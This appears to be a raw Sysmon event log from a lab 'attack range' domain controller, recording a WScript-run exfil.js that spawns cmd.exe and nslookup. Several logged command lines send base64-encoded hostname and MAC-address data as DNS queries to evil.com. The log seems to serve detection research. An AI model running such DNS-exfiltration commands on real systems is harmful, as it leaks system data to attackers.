14:21:33.059{2E1864BB-18E0-629A-6742-000000005F02}39761080C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-D543-000000005F02}7712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.074{2E1864BB-18ED-629A-D543-000000005F02}7712C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmuukf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.059{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloqqxhd.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-18ED-629A-D343-000000005F02}61727912C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-D443-000000005F02}6432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D443-000000005F02}6432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.043{2E1864BB-18ED-629A-D243-000000005F02}65563500C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-D443-000000005F02}6432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.051{2E1864BB-18ED-629A-D443-000000005F02}6432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-D243-000000005F02}6556C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloqqxhd.tmp 2>&1 10341000x8000000000000000209356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.028{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-D343-000000005F02}6172C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.028{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-D343-000000005F02}6172C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-50681-false127.0.0.1-53domain 354300x8000000000000000209353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-50680-false127.0.0.1-53domain 354300x8000000000000000209352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-50680-false127.0.0.1-53domain 354300x8000000000000000209351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-50679-false127.0.0.1-53domain 354300x8000000000000000209350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-50679-false127.0.0.1-53domain 354300x8000000000000000209349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{00000000-0000-0000-0000-000000000000}884<unknown process>-udpfalsefalse127.0.0.1-50673-false127.0.0.1-53domain 354300x8000000000000000209348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{00000000-0000-0000-0000-000000000000}884<unknown process>-udptruefalse127.0.0.1-50673-false127.0.0.1-53domain 354300x8000000000000000209347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.107{00000000-0000-0000-0000-000000000000}4932<unknown process>-udptruefalse127.0.0.1-50672-false127.0.0.1-53domain 354300x8000000000000000209346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.107{00000000-0000-0000-0000-000000000000}4932<unknown process>-udptruefalse127.0.0.1-50671-false127.0.0.1-53domain 354300x8000000000000000209345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.106{00000000-0000-0000-0000-000000000000}4932<unknown process>-udpfalsefalse127.0.0.1-50670-false127.0.0.1-53domain 354300x8000000000000000209344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.106{00000000-0000-0000-0000-000000000000}4932<unknown process>-udptruefalse127.0.0.1-50670-false127.0.0.1-53domain 354300x8000000000000000209343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.007{00000000-0000-0000-0000-000000000000}2076<unknown process>-udpfalsefalse127.0.0.1-50669-false127.0.0.1-53domain 354300x8000000000000000209342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.007{00000000-0000-0000-0000-000000000000}2076<unknown process>-udptruefalse127.0.0.1-50669-false127.0.0.1-53domain 354300x8000000000000000209341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.007{00000000-0000-0000-0000-000000000000}2076<unknown process>-udptruefalse127.0.0.1-50668-false127.0.0.1-53domain 10341000x8000000000000000209340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-18ED-629A-D343-000000005F02}61727912C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-D243-000000005F02}6556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.006{00000000-0000-0000-0000-000000000000}2076<unknown process>-udpfalsefalse127.0.0.1-50667-false127.0.0.1-53domain 10341000x8000000000000000209338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D343-000000005F02}6172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-D243-000000005F02}6556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.012{2E1864BB-18E0-629A-6742-000000005F02}39764036C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-D243-000000005F02}6556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.013{2E1864BB-18ED-629A-D243-000000005F02}6556C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloqqxhd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.997{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqwt.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044802Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:33.377{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A3AA41735862544F933E7196C6B7FE,SHA256=D5EC92BCE104D8A20068CA5DD1B4BDDBA07A6719CC7D4F2E4221D44593BDB3A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.981{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-2144-000000005F02}5724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.981{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-2144-000000005F02}5724C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.980{2E1864BB-18EE-629A-2144-000000005F02}5724336C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-2044-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.959{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-2144-000000005F02}5724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 